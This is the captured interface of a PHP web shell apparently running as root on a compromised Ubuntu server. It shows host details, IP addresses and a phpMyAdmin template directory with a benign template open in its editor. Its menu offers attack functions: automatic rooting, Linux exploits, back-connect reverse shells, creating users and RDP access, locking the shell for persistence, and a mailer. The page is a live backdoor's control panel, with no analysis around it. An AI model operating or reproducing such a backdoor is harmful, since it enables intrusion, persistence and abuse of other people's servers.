Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
phpmyadmin /
templates /
database /
designer /
[ HOME SHELL ]
Name
Size
Permission
Action
aggregate_query_panel.phtml
3.26
KB
-rw-r--r--
canvas.phtml
97
B
-rw-r--r--
database_tables.phtml
9.11
KB
-rw-r--r--
delete_relation_panel.phtml
1.56
KB
-rw-r--r--
edit_delete_pages.phtml
546
B
-rw-r--r--
having_query_panel.phtml
5.91
KB
-rw-r--r--
js_fields.phtml
868
B
-rw-r--r--
new_relation_panel.phtml
4.38
KB
-rw-r--r--
options_panel.phtml
11.83
KB
-rw-r--r--
page_save_as.phtml
1.13
KB
-rw-r--r--
page_selector.phtml
415
B
-rw-r--r--
query_details.phtml
505
B
-rw-r--r--
rename_to_panel.phtml
2.35
KB
-rw-r--r--
schema_export.phtml
504
B
-rw-r--r--
side_menu.phtml
7.39
KB
-rw-r--r--
table_list.phtml
3.49
KB
-rw-r--r--
where_query_panel.phtml
4.15
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : edit_delete_pages.phtml
<?php $cfgRelation = PMA_getRelationsParam(); ?> <form action="db_designer.php" method="post" name="edit_delete_pages" id="edit_delete_pages" class="ajax"> <?= PMA_URL_getHiddenInputs($db); ?> <fieldset id="page_edit_delete_options"> <input type="hidden" name="operation" value="<?= $operation; ?>" /> <label for="selected_page"> <?= $operation == 'editPage' ? __("Page to open") : __("Page to delete"); ?>: </label> <?= PMA_getHtmlForPageSelector($cfgRelation, $db); ?> </fieldset> </form>
Close